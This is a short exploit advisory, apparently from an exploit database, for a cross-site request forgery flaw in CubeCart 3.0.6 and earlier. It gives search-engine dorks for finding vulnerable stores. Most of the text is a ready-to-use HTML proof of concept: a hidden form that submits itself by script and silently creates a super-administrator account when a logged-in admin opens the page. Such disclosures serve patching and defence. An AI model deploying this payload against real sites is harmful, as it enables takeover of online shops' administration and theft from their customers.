CubeCart 3.0.6 Cross Site Request Forgery

`#Title : CubeCart <= 3.0.6 CSRF Add Admin  
#Script : CubeCart <= 3.0.6  
#Language : Php  
#Download : http://www.cubecart.com/  
#Date : 2010/12/24  
#Version : 3.0.6  
#Dork : "Powered by CubeCart 3.0.4"  
#Dork : "Powered by CubeCart 3.0.5"  
#Dork : "Powered by CubeCart 3.0.6"  
#Found : by P0C T34M >> tnt-r00t  
#Homepage : www.p0c.cc  
  
  
<form name="p0c" action="http://127.0.0.1/cc/admin/adminusers/administrators.php?mode=new" method="post">  
  
<input name="name" type="hidden" value="myname"/ >  
<input name="adminUsername" type="hidden" value="r00t" />  
<input name="email" type="hidden" value="[email protected]">  
<input name="adminPassword" type="hidden" value="t00r" />  
<input name="isSuper" type="hidden" value="1" checked="checked" type="radio"/>  
<input name="adminId" value="" type="hidden"/>  
<input name="Submit" type="hidden" class="submit" value="Add User" type="submit"/>  
  
  
</form>  
<script>document.p0c.submit();</script>  
  
NICKNAME: P0C T34M  
  
`